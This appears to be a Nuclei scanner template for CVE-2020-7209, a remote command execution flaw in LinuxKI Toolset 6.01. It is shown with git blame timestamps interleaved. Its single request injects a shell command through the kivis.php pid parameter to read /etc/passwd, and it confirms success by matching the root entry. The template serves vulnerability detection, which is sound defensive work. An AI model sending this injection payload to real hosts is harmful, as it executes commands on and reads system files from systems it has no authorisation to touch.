2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-7209
|
2020-07-07 19:28:16 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: LinuxKI Toolset 6.01 Remote Command Execution
|
|
|
|
author: dwisiswant0
|
|
|
|
severity: critical
|
|
|
|
|
|
|
|
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
|
|
|
|
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
|
2020-07-07 19:55:24 +00:00
|
|
|
|
2020-07-07 19:28:16 +00:00
|
|
|
# https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
|
2020-09-01 13:08:31 +00:00
|
|
|
# venedor: https://www.hpe.com/us/en/home.html
|
|
|
|
# softwar: https://github.com/HewlettPackard/LinuxKI
|
2020-07-07 19:28:16 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-09-01 13:08:31 +00:00
|
|
|
- "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"
|
|
|
|
|
2020-07-07 19:28:16 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2020-09-01 13:08:31 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0:"
|
2020-07-07 19:28:16 +00:00
|
|
|
part: body
|